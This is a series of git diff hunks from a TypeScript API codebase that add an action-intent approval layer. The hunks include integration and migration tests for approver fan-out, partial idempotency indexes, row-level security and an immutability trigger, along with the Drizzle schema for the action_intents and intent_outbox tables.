+        .from(approvalRequests)
+        .where(eq(approvalRequests.intentId, snapshot.id)),
+    );
+    const fannedOutUserIds = fanOutRows.map((r) => r.userId).sort();
+    expect(fannedOutUserIds).toEqual([s.orgApprover.id, s.partnerApprover.id].sort());
+    expect(fannedOutUserIds).not.toContain(s.requester.id);
+    // Every fanned-out row is bound to the same argument digest as the intent
+    // (spec §3.2's tamper-detection bind — asserted here, not just relied on).
+    for (const row of fanOutRows) {
+      expect(row.boundDigest).toBe(snapshot.argumentDigest);
+    }
+
+    const [intentRow] = await withSystemDbAccessContext(() =>
+      db.select().from(actionIntents).where(eq(actionIntents.id, snapshot.id)),
+    );
+    expect(intentRow?.partnerId).toBe(s.partnerId);
+    expect(intentRow?.status).toBe('pending_approval');
+    expect(intentRow?.requestedByUserId).toBe(s.requester.id);
+  });
+
+  it('creates a NEW intent for an identical duplicate request once the prior intent has terminalized (partial idempotency index)', async () => {
+    const s = seeded!;
+    const auth = requesterAuth(s.requester, s.orgId, s.partnerId, s.requesterRoleId);
+    const input = {
+      toolName: 'execute_command',
+      input: { deviceId: randomUUID(), commandType: 'list_processes' },
+      source: 'chat' as const,
+    };
+
+    const first = await createActionIntent(auth, input);
+    expect(first.status).toBe('pending_approval');
+
+    // Terminalize it — action_intents_org_idem_uniq only covers LIVE
+    // statuses (pending_approval/approved/executing), so once this row is
+    // terminal it must stop blocking a legitimate future identical request.
+    const terminalized = await transitionIntent(first.id, 'pending_approval', 'cancelled');
+    expect(terminalized).toBe(true);
+
+    // Same requester, same tool, same (canonicalized) args → same derived
+    // idempotency key. Before IMPORTANT-4 this would have 23505'd against
+    // the now-terminal row instead of creating a fresh one.
+    const second = await createActionIntent(auth, input);
+    expect(second.id).not.toBe(first.id);
+    expect(second.status).toBe('pending_approval');
+    expect(second.approvalRequestIds).toHaveLength(2);
+
+    const secondFanOut = await withSystemDbAccessContext(() =>
+      db
+        .select({ userId: approvalRequests.userId })
+        .from(approvalRequests)
+        .where(eq(approvalRequests.intentId, second.id)),
+    );
+    expect(secondFanOut.map((r) => r.userId).sort()).toEqual([s.orgApprover.id, s.partnerApprover.id].sort());
+
+    // The terminalized first intent's own fan-out rows must be untouched by
+    // the second creation (still exactly its original 2 rows, still bound to
+    // the FIRST intent's id).
+    const firstFanOut = await withSystemDbAccessContext(() =>
+      db
+        .select({ id: approvalRequests.id })
+        .from(approvalRequests)
+        .where(eq(approvalRequests.intentId, first.id)),
+    );
+    expect(firstFanOut).toHaveLength(2);
+  });
+});

--- a/apps/api/src/__tests__/integration/rls-coverage.integration.test.ts
+++ b/apps/api/src/__tests__/integration/rls-coverage.integration.test.ts
@@ -68,6 +68,7 @@ const EXEMPT_TABLES: ReadonlySet<string> = new Set<string>([
 // scoped by design) — see apps/api/src/db/schema/devices.ts.
 const INTENTIONAL_UNSCOPED: ReadonlySet<string> = new Set<string>([
   'device_commands', // Agent WS path: system-scoped command queue, no tenant isolation needed.
+  'intent_outbox', // Action intents transactional outbox (spec 2026-07-18): system-scoped, workers-only queue, no tenant isolation needed. FK-cascades from action_intents (org-scoped, RLS shape 1). Mirrors device_commands.
   'manifest_signing_keys', // System-scoped: per-deployment agent-update signing key. Forced RLS, no policies → only system context.
   'm365_consent_sessions', // OAuth consent state: forced RLS, system-only policies; tenant scopes must never read verifier/nonce material.
   'vulnerability_sources', // Global vulnerability-source sync metadata. Forced RLS, no tenant policies → only system context.

--- a/apps/api/src/db/migration-action-intents.test.ts
+++ b/apps/api/src/db/migration-action-intents.test.ts
@@ -92,9 +92,14 @@ describe('Action intents migration', () => {
     }
   });
 
-  it('forces RLS on intent_outbox with no permissive policies (system-scoped)', () => {
-    expect(sql).toMatch(/ALTER TABLE intent_outbox ENABLE ROW LEVEL SECURITY/);
-    expect(sql).toMatch(/ALTER TABLE intent_outbox FORCE ROW LEVEL SECURITY/);
+  it('leaves intent_outbox truly unscoped, with no RLS and no policies (matches device_commands)', () => {
+    // FORCE ROW LEVEL SECURITY with zero policies is default-DENY for every
+    // access path — breeze_app is NOSUPERUSER NOBYPASSRLS and
+    // withSystemDbAccessContext only sets the breeze.scope GUC, it does not
+    // bypass RLS. So intent_outbox must carry NO ENABLE/FORCE ROW LEVEL
+    // SECURITY at all, same as device_commands, or every INSERT 42501s.
+    expect(sql).not.toMatch(/ALTER TABLE intent_outbox ENABLE ROW LEVEL SECURITY/);
+    expect(sql).not.toMatch(/ALTER TABLE intent_outbox FORCE ROW LEVEL SECURITY/);
     expect(sql).not.toMatch(/CREATE POLICY[^\n]*ON intent_outbox/i);
   });
 

--- a/apps/api/src/db/migration-action-intents.test.ts
+++ b/apps/api/src/db/migration-action-intents.test.ts
@@ -1,0 +1,100 @@
+import { readFileSync } from 'node:fs';
+import { join } from 'node:path';
+import { describe, expect, it } from 'vitest';
+
+describe('Action intents migration', () => {
+  const migrationPath = join(__dirname, '../../migrations/2026-07-18-action-intents.sql');
+  const sql = readFileSync(migrationPath, 'utf8');
+
+  it('is idempotent: only IF NOT EXISTS / IF EXISTS / DO-guarded DDL', () => {
+    expect(sql).toMatch(/CREATE TABLE IF NOT EXISTS action_intents/i);
+    expect(sql).toMatch(/CREATE TABLE IF NOT EXISTS intent_outbox/i);
+    expect(sql).toMatch(/CREATE UNIQUE INDEX IF NOT EXISTS action_intents_org_idem_uniq/i);
+    expect(sql).toMatch(/CREATE INDEX IF NOT EXISTS action_intents_org_status_idx/i);
+    expect(sql).toMatch(/CREATE INDEX IF NOT EXISTS intent_outbox_unpublished_idx/i);
+    expect(sql).toMatch(/ALTER TABLE approval_requests ADD COLUMN IF NOT EXISTS intent_id/i);
+    expect(sql).toMatch(
+      /ALTER TABLE approval_requests ADD COLUMN IF NOT EXISTS bound_argument_digest/i,
+    );
+    expect(sql).toMatch(
+      /ALTER TABLE approval_requests DROP CONSTRAINT IF EXISTS approval_requests_one_source_chk/i,
+    );
+    expect(sql).toMatch(/DROP POLICY IF EXISTS breeze_org_isolation_select ON action_intents/i);
+  });
+
+  it('never calls gen_random_bytes and never opens an inner transaction', () => {
+    expect(sql).not.toMatch(/gen_random_bytes\(/i);
+    expect(sql).not.toMatch(/^\s*BEGIN;/im);
+    expect(sql).not.toMatch(/^\s*COMMIT;/im);
+    expect(sql).toMatch(/gen_random_uuid\(\)/);
+  });
+
+  it('uses gen_random_uuid() (pgcrypto-free) for the PK default', () => {
+    expect(sql).toMatch(/id UUID PRIMARY KEY DEFAULT gen_random_uuid\(\)/);
+  });
+
+  it('declares the immutability trigger over exactly the content columns', () => {
+    expect(sql).toMatch(/action_intents_block_content_update/);
+    expect(sql).toMatch(/action_intents_immutable_trg/);
+    expect(sql).toMatch(/RAISE EXCEPTION 'action_intents content is immutable'/);
+    // Lifecycle columns must NOT appear in the immutability check.
+    const triggerBody = sql.slice(
+      sql.indexOf('action_intents_block_content_update() RETURNS trigger'),
+      sql.indexOf('END $$ LANGUAGE plpgsql;'),
+    );
+    for (const lifecycleCol of ['status', 'decided_at', 'executed_at', 'result', 'error_code']) {
+      expect(triggerBody).not.toMatch(new RegExp(`NEW\\.${lifecycleCol}\\b`));
+    }
+  });
+
+  it('enables and forces RLS on action_intents with breeze_has_org_access policies', () => {
+    expect(sql).toMatch(/ALTER TABLE action_intents ENABLE ROW LEVEL SECURITY/);
+    expect(sql).toMatch(/ALTER TABLE action_intents FORCE ROW LEVEL SECURITY/);
+    const selectPolicyMatches = sql.match(
+      /CREATE POLICY breeze_org_isolation_select ON action_intents[\s\S]*?breeze_has_org_access\(org_id\)/,
+    );
+    expect(selectPolicyMatches).not.toBeNull();
+    for (const cmd of ['insert', 'update', 'delete']) {
+      expect(sql.toLowerCase()).toMatch(
+        new RegExp(`create policy breeze_org_isolation_${cmd} on action_intents`),
+      );
+    }
+  });
+
+  it('forces RLS on intent_outbox with no permissive policies (system-scoped)', () => {
+    expect(sql).toMatch(/ALTER TABLE intent_outbox ENABLE ROW LEVEL SECURITY/);
+    expect(sql).toMatch(/ALTER TABLE intent_outbox FORCE ROW LEVEL SECURITY/);
+    expect(sql).not.toMatch(/CREATE POLICY[^\n]*ON intent_outbox/i);
+  });
+
+  it('cascades intent_outbox and approval_requests.intent_id from action_intents', () => {
+    expect(sql).toMatch(
+      /intent_id UUID NOT NULL REFERENCES action_intents\(id\) ON DELETE CASCADE/,
+    );
+    expect(sql).toMatch(
+      /ADD COLUMN IF NOT EXISTS intent_id UUID\s+REFERENCES action_intents\(id\) ON DELETE CASCADE/,
+    );
+  });
+
+  it('enforces at most one source link on approval_requests, permitting all-NULL', () => {
+    expect(sql).toMatch(/CONSTRAINT approval_requests_one_source_chk/);
+    expect(sql).toMatch(/<=\s*1/);
+  });
+
+  it('enforces exactly one actor on action_intents', () => {
+    expect(sql).toMatch(/CONSTRAINT action_intents_one_actor_chk/);
+    expect(sql).toMatch(
+      /CHECK \(\(requested_by_user_id IS NULL\) <> \(requesting_api_key_id IS NULL\)\)/,
+    );
+  });
+
+  it('declares the source/status/event_type CHECK-constrained value lists exactly as spec\'d', () => {
+    expect(sql).toMatch(/source TEXT NOT NULL CHECK \(source IN \('chat','mcp_api'\)\)/);
+    expect(sql).toMatch(
+      /status TEXT NOT NULL DEFAULT 'pending_approval'\s+CHECK \(status IN \('pending_approval','approved','executing','completed','failed','rejected','expired','cancelled'\)\)/,
+    );
+    expect(sql).toMatch(
+      /event_type TEXT NOT NULL CHECK \(event_type IN \('intent_created','intent_approved'\)\)/,
+    );
+  });
+});

--- a/apps/api/src/db/migration-action-intents.test.ts
+++ b/apps/api/src/db/migration-action-intents.test.ts
@@ -1,6 +1,11 @@
+import { randomUUID } from 'node:crypto';
 import { readFileSync } from 'node:fs';
 import { join } from 'node:path';
-import { describe, expect, it } from 'vitest';
+import { describe, expect, it, beforeAll } from 'vitest';
+import { eq } from 'drizzle-orm';
+import { db, withSystemDbAccessContext } from './index';
+import { partners, organizations, users, actionIntents } from './schema';
+import type { NewActionIntent } from './schema/actionIntents';
 
 describe('Action intents migration', () => {
   const migrationPath = join(__dirname, '../../migrations/2026-07-18-action-intents.sql');
@@ -12,6 +17,7 @@ describe('Action intents migration', () => {
     expect(sql).toMatch(/CREATE UNIQUE INDEX IF NOT EXISTS action_intents_org_idem_uniq/i);
     expect(sql).toMatch(/CREATE INDEX IF NOT EXISTS action_intents_org_status_idx/i);
     expect(sql).toMatch(/CREATE INDEX IF NOT EXISTS intent_outbox_unpublished_idx/i);
+    expect(sql).toMatch(/CREATE INDEX IF NOT EXISTS intent_outbox_intent_id_idx/i);
     expect(sql).toMatch(/ALTER TABLE approval_requests ADD COLUMN IF NOT EXISTS intent_id/i);
     expect(sql).toMatch(
       /ALTER TABLE approval_requests ADD COLUMN IF NOT EXISTS bound_argument_digest/i,
@@ -33,15 +39,40 @@ describe('Action intents migration', () => {
     expect(sql).toMatch(/id UUID PRIMARY KEY DEFAULT gen_random_uuid\(\)/);
   });
 
+  // The 12 spec-defined immutable content columns (§3.1/§3.4). Kept as a
+  // single source of truth for both the static trigger-body check below and
+  // the live-DB behavioral suite.
+  const IMMUTABLE_CONTENT_COLUMNS = [
+    'action_name',
+    'action_version',
+    'arguments',
+    'argument_digest',
+    'target_summary',
+    'impact_summary',
+    'reason',
+    'risk_tier',
+    'connection_id',
+    'tenant_id',
+    'idempotency_key',
+    'correlation_id',
+  ] as const;
+
   it('declares the immutability trigger over exactly the content columns', () => {
     expect(sql).toMatch(/action_intents_block_content_update/);
     expect(sql).toMatch(/action_intents_immutable_trg/);
     expect(sql).toMatch(/RAISE EXCEPTION 'action_intents content is immutable'/);
-    // Lifecycle columns must NOT appear in the immutability check.
     const triggerBody = sql.slice(
       sql.indexOf('action_intents_block_content_update() RETURNS trigger'),
       sql.indexOf('END $$ LANGUAGE plpgsql;'),
     );
+    // Every one of the 12 spec'd immutable content columns must be guarded.
+    for (const contentCol of IMMUTABLE_CONTENT_COLUMNS) {
+      expect(
+        triggerBody,
+        `expected trigger body to guard content column ${contentCol}`,
+      ).toMatch(new RegExp(`NEW\\.${contentCol}\\b`));
+    }
+    // Lifecycle columns must NOT appear in the immutability check.
     for (const lifecycleCol of ['status', 'decided_at', 'executed_at', 'result', 'error_code']) {
       expect(triggerBody).not.toMatch(new RegExp(`NEW\\.${lifecycleCol}\\b`));
     }
@@ -76,9 +107,29 @@ describe('Action intents migration', () => {
     );
   });
 
+  it('indexes intent_outbox.intent_id (matches the Drizzle intentIdIdx declaration)', () => {
+    expect(sql).toMatch(
+      /CREATE INDEX IF NOT EXISTS intent_outbox_intent_id_idx\s+ON intent_outbox \(intent_id\)/,
+    );
+  });
+
   it('enforces at most one source link on approval_requests, permitting all-NULL', () => {
     expect(sql).toMatch(/CONSTRAINT approval_requests_one_source_chk/);
     expect(sql).toMatch(/<=\s*1/);
+  });
+
+  it('preflights the approval_requests_one_source_chk constraint with a warn-only row count', () => {
+    // Finding 3: a diagnosable, non-destructive COUNT before the constraint
+    // add — must appear before the DROP CONSTRAINT/ADD CONSTRAINT pair and
+    // must not DELETE or UPDATE any rows.
+    const constraintIdx = sql.indexOf('ALTER TABLE approval_requests DROP CONSTRAINT');
+    const preflightIdx = sql.indexOf('SELECT COUNT(*) INTO n');
+    expect(preflightIdx).toBeGreaterThan(-1);
+    expect(preflightIdx).toBeLessThan(constraintIdx);
+    const preflightBlock = sql.slice(sql.lastIndexOf('DO $$', constraintIdx), constraintIdx);
+    expect(preflightBlock).toMatch(/GET DIAGNOSTICS|SELECT COUNT\(\*\) INTO n/);
+    expect(preflightBlock).toMatch(/RAISE WARNING/);
+    expect(preflightBlock).not.toMatch(/\bDELETE\b|\bUPDATE\b/i);
   });
 
   it('enforces exactly one actor on action_intents', () => {
@@ -96,5 +147,110 @@ describe('Action intents migration', () => {
     expect(sql).toMatch(
       /event_type TEXT NOT NULL CHECK \(event_type IN \('intent_created','intent_approved'\)\)/,
     );
+  });
+
+  // Live-DB behavioral coverage for the immutability trigger (Finding 1).
+  // Runs only when a real database is reachable (DATABASE_URL set) — e.g.
+  // under vitest.integration.config.ts, or a manual local run against the
+  // docker-compose test Postgres. Under the plain unit runner (no
+  // DATABASE_URL) these are skipped, leaving the static trigger-body checks
+  // above as the fallback coverage.
+  describe.runIf(!!process.env.DATABASE_URL)('immutability trigger (live DB)', () => {
+    let intentId: string;
+
+    beforeAll(async () => {
+      const sfx = randomUUID().slice(0, 8);
+      await withSystemDbAccessContext(async () => {
+        const [partner] = await db
+          .insert(partners)
+          .values({ name: `Intent Test Partner ${sfx}`, slug: `intent-test-${sfx}` })
+          .returning({ id: partners.id });
+        const [org] = await db
+          .insert(organizations)
+          .values({ partnerId: partner!.id, name: 'Intent Test Org', slug: `intent-test-org-${sfx}` })
+          .returning({ id: organizations.id });
+        const [user] = await db
+          .insert(users)
+          .values({
+            partnerId: partner!.id,
+            orgId: org!.id,
+            email: `intent-test-${sfx}@example.com`,
+            name: 'Intent Test User',
+            status: 'active',
+          })
+          .returning({ id: users.id });
+
+        const values: NewActionIntent = {
+          orgId: org!.id,
+          partnerId: partner!.id,
+          requestedByUserId: user!.id,
+          source: 'chat',
+          actionName: 'm365.mailbox.disable',
+          actionVersion: 1,
+          arguments: { mailbox: 'user@example.com' },
+          argumentDigest: 'a'.repeat(64),
+          targetSummary: 'Disable mailbox user@example.com',
+          impactSummary: 'User loses mailbox access immediately',
+          reason: 'Offboarding',
+          riskTier: 3,
+          connectionId: randomUUID(),
+          tenantId: randomUUID(),
+          idempotencyKey: `idem-${sfx}`,
+          correlationId: randomUUID(),
+          expiresAt: new Date(Date.now() + 60 * 60 * 1000),
+        };
+        const [intent] = await db.insert(actionIntents).values(values).returning({
+          id: actionIntents.id,
+        });
+        intentId = intent!.id;
+      });
+    });
+
+    const contentColumnUpdates: Array<[string, Partial<NewActionIntent>]> = [
+      ['action_name', { actionName: 'm365.mailbox.enable' }],
+      ['action_version', { actionVersion: 2 }],
+      ['arguments', { arguments: { mailbox: 'someone-else@example.com' } }],
+      ['argument_digest', { argumentDigest: 'b'.repeat(64) }],
+      ['target_summary', { targetSummary: 'Disable mailbox someone-else@example.com' }],
+      ['impact_summary', { impactSummary: 'A different user loses access' }],
+      ['reason', { reason: 'Changed reason' }],
+      ['risk_tier', { riskTier: 2 }],
+      ['connection_id', { connectionId: randomUUID() }],
+      ['tenant_id', { tenantId: randomUUID() }],
+      ['idempotency_key', { idempotencyKey: `idem-changed-${randomUUID().slice(0, 8)}` }],
+      ['correlation_id', { correlationId: randomUUID() }],
+    ];
+
+    it.each(contentColumnUpdates)(
+      'rejects an UPDATE that changes the content column %s',
+      async (_column, patch) => {
+        // Drizzle/postgres-js wraps the underlying Postgres error: the thrown
+        // error's own `.message` is a generic "Failed query: ..." summary,
+        // and the actual RAISE EXCEPTION text lands on `.cause.message`.
+        let caught: unknown;
+        try {
+          await withSystemDbAccessContext(() =>
+            db.update(actionIntents).set(patch).where(eq(actionIntents.id, intentId)),
+          );
+        } catch (err) {
+          caught = err;
+        }
+        expect(caught, 'expected the immutability trigger to reject the UPDATE').toBeDefined();
+        const cause = (caught as { cause?: unknown })?.cause;
+        const causeMessage = cause instanceof Error ? cause.message : undefined;
+        const topMessage = caught instanceof Error ? caught.message : String(caught);
+        expect(causeMessage ?? topMessage).toMatch(/action_intents content is immutable/);
+      },
+    );
+
+    it('allows an UPDATE to a lifecycle column (status) to succeed', async () => {
+      await withSystemDbAccessContext(() =>
+        db.update(actionIntents).set({ status: 'approved' }).where(eq(actionIntents.id, intentId)),
+      );
+      const [row] = await withSystemDbAccessContext(() =>
+        db.select({ status: actionIntents.status }).from(actionIntents).where(eq(actionIntents.id, intentId)),
+      );
+      expect(row?.status).toBe('approved');
+    });
   });
 });

--- a/apps/api/src/db/schema/actionIntents.test.ts
+++ b/apps/api/src/db/schema/actionIntents.test.ts
@@ -1,0 +1,178 @@
+import { describe, it, expect } from 'vitest';
+import { getTableColumns } from 'drizzle-orm';
+import {
+  actionIntents,
+  intentOutbox,
+  actionIntentStatusEnum,
+  actionIntentSourceEnum,
+  intentOutboxEventEnum,
+} from './actionIntents';
+import { approvalRequests } from './approvals';
+
+describe('actionIntentStatusEnum', () => {
+  it('has exactly the eight lifecycle states, in order', () => {
+    expect(actionIntentStatusEnum).toEqual([
+      'pending_approval',
+      'approved',
+      'executing',
+      'completed',
+      'failed',
+      'rejected',
+      'expired',
+      'cancelled',
+    ]);
+  });
+});
+
+describe('actionIntentSourceEnum', () => {
+  it('has exactly chat and mcp_api', () => {
+    expect(actionIntentSourceEnum).toEqual(['chat', 'mcp_api']);
+  });
+});
+
+describe('intentOutboxEventEnum', () => {
+  it('has exactly intent_created and intent_approved', () => {
+    expect(intentOutboxEventEnum).toEqual(['intent_created', 'intent_approved']);
+  });
+});
+
+describe('action_intents schema', () => {
+  it('exposes the identity/attribution columns', () => {
+    const cols = getTableColumns(actionIntents);
+    expect(cols.id).toBeDefined();
+    expect(cols.orgId).toBeDefined();
+    expect(cols.orgId.notNull).toBe(true);
+    expect(cols.partnerId).toBeDefined();
+    expect(cols.partnerId.notNull).toBe(false);
+    expect(cols.requestedByUserId).toBeDefined();
+    expect(cols.requestedByUserId.notNull).toBe(false);
+    expect(cols.requestingApiKeyId).toBeDefined();
+    expect(cols.requestingApiKeyId.notNull).toBe(false);
+    expect(cols.source).toBeDefined();
+    expect(cols.source.notNull).toBe(true);
+    expect(cols.requestingClientLabel).toBeDefined();
+    expect(cols.requestingClientLabel.notNull).toBe(false);
+  });
+
+  it('exposes the 12 immutable content columns', () => {
+    const cols = getTableColumns(actionIntents);
+    const immutable = [
+      'actionName',
+      'actionVersion',
+      'arguments',
+      'argumentDigest',
+      'targetSummary',
+      'impactSummary',
+      'reason',
+      'riskTier',
+      'connectionId',
+      'tenantId',
+      'idempotencyKey',
+      'correlationId',
+    ] as const;
+    expect(immutable).toHaveLength(12);
+    for (const key of immutable) {
+      expect(cols[key], `expected column ${key} to exist`).toBeDefined();
+    }
+    expect(cols.actionName.notNull).toBe(true);
+    expect(cols.actionVersion.notNull).toBe(true);
+    expect(cols.actionVersion.default).toBe(1);
+    expect(cols.arguments.notNull).toBe(true);
+    expect(cols.arguments.default).toEqual({});
+    expect(cols.argumentDigest.notNull).toBe(true);
+    expect(cols.targetSummary.notNull).toBe(true);
+    expect(cols.impactSummary.notNull).toBe(true);
+    expect(cols.reason.notNull).toBe(false);
+    expect(cols.riskTier.notNull).toBe(true);
+    expect(cols.connectionId.notNull).toBe(false);
+    expect(cols.tenantId.notNull).toBe(false);
+    expect(cols.idempotencyKey.notNull).toBe(true);
+    expect(cols.correlationId.notNull).toBe(true);
+  });
+
+  it('exposes the lifecycle columns', () => {
+    const cols = getTableColumns(actionIntents);
+    expect(cols.status).toBeDefined();
+    expect(cols.status.notNull).toBe(true);
+    expect(cols.status.default).toBe('pending_approval');
+    expect(cols.createdAt.notNull).toBe(true);
+    expect(cols.expiresAt).toBeDefined();
+    expect(cols.expiresAt.notNull).toBe(true);
+    expect(cols.decidedAt).toBeDefined();
+    expect(cols.decidedAt.notNull).toBe(false);
+    expect(cols.decidedByUserId).toBeDefined();
+    expect(cols.decidedAssuranceLevel).toBeDefined();
+    expect(cols.decidedVia).toBeDefined();
+    expect(cols.executedAt).toBeDefined();
+    expect(cols.result).toBeDefined();
+    expect(cols.errorCode).toBeDefined();
+  });
+
+  it('has no extra/missing top-level columns', () => {
+    const cols = Object.keys(getTableColumns(actionIntents)).sort();
+    expect(cols).toEqual(
+      [
+        'id',
+        'orgId',
+        'partnerId',
+        'requestedByUserId',
+        'requestingApiKeyId',
+        'source',
+        'requestingClientLabel',
+        'actionName',
+        'actionVersion',
+        'arguments',
+        'argumentDigest',
+        'targetSummary',
+        'impactSummary',
+        'reason',
+        'riskTier',
+        'connectionId',
+        'tenantId',
+        'idempotencyKey',
+        'correlationId',
+        'status',
+        'createdAt',
+        'expiresAt',
+        'decidedAt',
+        'decidedByUserId',
+        'decidedAssuranceLevel',
+        'decidedVia',
+        'executedAt',
+        'result',
+        'errorCode',
+      ].sort(),
+    );
+  });
+});
+
+describe('intent_outbox schema', () => {
+  it('exposes the outbox columns', () => {
+    const cols = getTableColumns(intentOutbox);
+    expect(Object.keys(cols).sort()).toEqual(
+      ['id', 'intentId', 'eventType', 'payload', 'createdAt', 'publishedAt', 'publishAttempts'].sort(),
+    );
+    expect(cols.intentId.notNull).toBe(true);
+    expect(cols.eventType.notNull).toBe(true);
+    expect(cols.payload.notNull).toBe(true);
+    expect(cols.payload.default).toEqual({});
+    expect(cols.createdAt.notNull).toBe(true);
+    expect(cols.publishedAt.notNull).toBe(false);
+    expect(cols.publishAttempts.notNull).toBe(true);
+    expect(cols.publishAttempts.default).toBe(0);
+  });
+});
+
+describe('approval_requests intent linkage', () => {
+  it('gains a nullable intentId FK column', () => {
+    const cols = getTableColumns(approvalRequests);
+    expect(cols.intentId).toBeDefined();
+    expect(cols.intentId.notNull).toBe(false);
+  });
+
+  it('gains a nullable boundArgumentDigest char(64) column', () => {
+    const cols = getTableColumns(approvalRequests);
+    expect(cols.boundArgumentDigest).toBeDefined();
+    expect(cols.boundArgumentDigest.notNull).toBe(false);
+  });
+});

--- a/apps/api/src/db/schema/actionIntents.ts
+++ b/apps/api/src/db/schema/actionIntents.ts
@@ -8,7 +8,6 @@ import {
   smallint,
   text,
   timestamp,
-  uniqueIndex,
   uuid,
   varchar,
 } from 'drizzle-orm/pg-core';
@@ -109,15 +108,18 @@ export const actionIntents = pgTable(
     errorCode: text('error_code'),
   },
   (table) => ({
-    orgIdemUniq: uniqueIndex('action_intents_org_idem_uniq').on(
-      table.orgId,
-      table.idempotencyKey,
-    ),
     orgStatusIdx: index('action_intents_org_status_idx').on(
       table.orgId,
       table.status,
       table.expiresAt,
     ),
+    // Note: action_intents_org_idem_uniq is a PARTIAL unique index (WHERE
+    // status IN ('pending_approval','approved','executing') — IMPORTANT-4)
+    // declared in the SQL migration only; Drizzle's index DSL doesn't model
+    // partial indexes cleanly (same precedent as intent_outbox_unpublished_idx
+    // below / elevations.ts's elevation_requests_org_pending_idx et al). The
+    // matching partial predicate is passed to onConflictDoNothing's `where`
+    // in intentService.ts's createActionIntent — see the comment there.
   }),
 );
 

--- a/apps/api/src/db/schema/actionIntents.ts
+++ b/apps/api/src/db/schema/actionIntents.ts
@@ -1,0 +1,156 @@
+import {
+  bigserial,
+  char,
+  index,
+  integer,
+  jsonb,
+  pgTable,
+  smallint,
+  text,
+  timestamp,
+  uniqueIndex,
+  uuid,
+  varchar,
+} from 'drizzle-orm/pg-core';
+import type { AssuranceLevel } from '@breeze/shared';
+import { organizations, partners } from './orgs';
+import { users } from './users';
+import { apiKeys } from './apiKeys';
+
+// Action intents & durable approval layer (spec
+// docs/superpowers/specs/2026-07-18-action-intents-approval-layer-design.md).
+//
+// Tenancy Shape 1: direct `org_id` column. `partner_id` is denormalized for
+// ops queries only (mirrors elevations.ts / devices.ts) — it is NOT an
+// ownership axis (not dual-axis; org_id is always required). RLS policies key
+// on breeze_has_org_access(org_id), same migration.
+//
+// status/source/event_type are plain string unions backed by TEXT + CHECK
+// columns in the migration, not Drizzle's `pgEnum()` — every existing
+// `pgEnum()` in this codebase (elevationStatusEnum, approvalStatusEnum,
+// cisBaselineLevelEnum, ...) is paired with a real `CREATE TYPE ... AS ENUM`.
+// This table intentionally has none (see the migration header for why), so
+// modeling it as `pgEnum()` here would claim a native type that doesn't
+// exist. `.$type<T>()` on a `text()` column is the established alternative
+// for CHECK-constrained string columns without a backing enum type (see
+// apps/api/src/db/schema/m365.ts — profile/authMode/status).
+
+export const actionIntentStatusEnum = [
+  'pending_approval',
+  'approved',
+  'executing',
+  'completed',
+  'failed',
+  'rejected',
+  'expired',
+  'cancelled',
+] as const;
+export type ActionIntentStatus = (typeof actionIntentStatusEnum)[number];
+
+export const actionIntentSourceEnum = ['chat', 'mcp_api'] as const;
+export type ActionIntentSource = (typeof actionIntentSourceEnum)[number];
+
+export const intentOutboxEventEnum = ['intent_created', 'intent_approved'] as const;
+export type IntentOutboxEvent = (typeof intentOutboxEventEnum)[number];
+
+export const actionIntents = pgTable(
+  'action_intents',
+  {
+    id: uuid('id').primaryKey().defaultRandom(),
+
+    // Tenancy (Shape 1)
+    orgId: uuid('org_id').notNull().references(() => organizations.id),
+    partnerId: uuid('partner_id').references(() => partners.id),
+
+    // Identity / attribution. Exactly one of requestedByUserId /
+    // requestingApiKeyId is set — enforced by action_intents_one_actor_chk
+    // (migration only; not modeled here, mirrors elevations.ts precedent).
+    requestedByUserId: uuid('requested_by_user_id').references(() => users.id, {
+      onDelete: 'set null',
+    }),
+    requestingApiKeyId: uuid('requesting_api_key_id').references(() => apiKeys.id, {
+      onDelete: 'set null',
+    }),
+    source: text('source').notNull().$type<ActionIntentSource>(),
+    requestingClientLabel: varchar('requesting_client_label', { length: 255 }),
+
+    // Immutable action content (UPDATE-blocked by action_intents_immutable_trg
+    // in the migration — material edits are a new intent, not an edit).
+    actionName: varchar('action_name', { length: 255 }).notNull(),
+    actionVersion: integer('action_version').notNull().default(1),
+    arguments: jsonb('arguments').$type<Record<string, unknown>>().notNull().default({}),
+    argumentDigest: char('argument_digest', { length: 64 }).notNull(),
+    targetSummary: text('target_summary').notNull(),
+    impactSummary: text('impact_summary').notNull(),
+    reason: text('reason'),
+    // 3 (Tier-3) only in v1; column exists for future Tier-2 policy use.
+    riskTier: smallint('risk_tier').notNull(),
+    // M365 mutation forward-compat (dormant until stage 5).
+    connectionId: uuid('connection_id'),
+    tenantId: uuid('tenant_id'),
+    idempotencyKey: text('idempotency_key').notNull(),
+    correlationId: uuid('correlation_id').notNull(),
+
+    // Lifecycle (mutable).
+    status: text('status').notNull().default('pending_approval').$type<ActionIntentStatus>(),
+    createdAt: timestamp('created_at', { withTimezone: true }).notNull().defaultNow(),
+    expiresAt: timestamp('expires_at', { withTimezone: true }).notNull(),
+    decidedAt: timestamp('decided_at', { withTimezone: true }),
+    decidedByUserId: uuid('decided_by_user_id').references(() => users.id, {
+      onDelete: 'set null',
+    }),
+    // Mirrors elevations.ts's decidedAssuranceLevel: DB-capped range is
+    // enforced by the release/decision handlers (later tasks), not a DB
+    // CHECK here; `.$type` keeps the inferred read type aligned.
+    decidedAssuranceLevel: smallint('decided_assurance_level').$type<AssuranceLevel>(),
+    decidedVia: text('decided_via'),
+    executedAt: timestamp('executed_at', { withTimezone: true }),
+    result: jsonb('result').$type<Record<string, unknown> | null>(),
+    errorCode: text('error_code'),
+  },
+  (table) => ({
+    orgIdemUniq: uniqueIndex('action_intents_org_idem_uniq').on(
+      table.orgId,
+      table.idempotencyKey,
+    ),
+    orgStatusIdx: index('action_intents_org_status_idx').on(
+      table.orgId,
+      table.status,
+      table.expiresAt,
+    ),
+  }),
+);
+
+export type ActionIntent = typeof actionIntents.$inferSelect;
+export type NewActionIntent = typeof actionIntents.$inferInsert;
+
+// Transactional outbox: written in the same transaction as the intent
+// row/status transition it announces. System-scoped (no org RLS, workers
+// only) — same shape as devices.ts's device_commands, documented as
+// INTENTIONAL_UNSCOPED in rls-coverage.integration.test.ts. FK is ON DELETE
+// CASCADE from action_intents, so org erasure cleans this up for free — no
+// separate entry in tenantCascade.ts's CORE_ORG_CASCADE_DELETE_ORDER.
+export const intentOutbox = pgTable(
+  'intent_outbox',
+  {
+    id: bigserial('id', { mode: 'number' }).primaryKey(),
+    intentId: uuid('intent_id').notNull().references(() => actionIntents.id, {
+      onDelete: 'cascade',
+    }),
+    eventType: text('event_type').notNull().$type<IntentOutboxEvent>(),
+    payload: jsonb('payload').$type<Record<string, unknown>>().notNull().default({}),
+    createdAt: timestamp('created_at', { withTimezone: true }).notNull().defaultNow(),
